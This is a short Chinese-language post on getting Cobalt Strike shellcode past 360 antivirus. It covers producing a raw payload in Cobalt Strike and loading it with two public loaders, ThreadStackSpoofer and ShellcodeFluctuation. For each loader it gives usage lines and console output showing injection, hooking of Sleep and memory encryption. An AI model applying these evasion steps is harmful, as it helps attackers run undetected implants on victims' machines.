cobalt strike免杀360

0、简介

CS生成Raw格式的shellcode:

Attacks ——> packages ——> Payload Generator 选择一个listener 生成payload.bin

1、ThreadStackSpoofer加载器

ThreadStackSpoofer加载器通过堆栈欺骗的方式进行免杀

工具地址:mgeeky/ThreadStackSpoofer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Usage: C:\> ThreadStackSpoofer.exe <shellcode> <spoof>
[.] Reading shellcode bytes...
[.] Hooking kernel32!Sleep...
[.] Injecting shellcode...
[+] Shellcode is now running.
[>] Original return address: 0x1926747bd51. Finishing call stack...

===> MySleep(5000)

[<] Restoring original return address...
[>] Original return address: 0x1926747bd51. Finishing call stack...

===> MySleep(5000)

[<] Restoring original return address...
[>] Original return address: 0x1926747bd51. Finishing call stack...

image-2

2、ShellcodeFluctuation加载器

ShellcodeFluctuation加载器通过循环加密和解密 shellcode 的内容的方式进行免杀。

工具地址:mgeeky/ShellcodeFluctuation

1
2
3
4
5
6
Usage: C:\> ShellcodeFluctuation.exe <shellcode> <fluctuate>
<fluctuate>:
       -1 - Read shellcode but dont inject it. Run in an infinite loop.
        0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything
        1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.
        2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.

img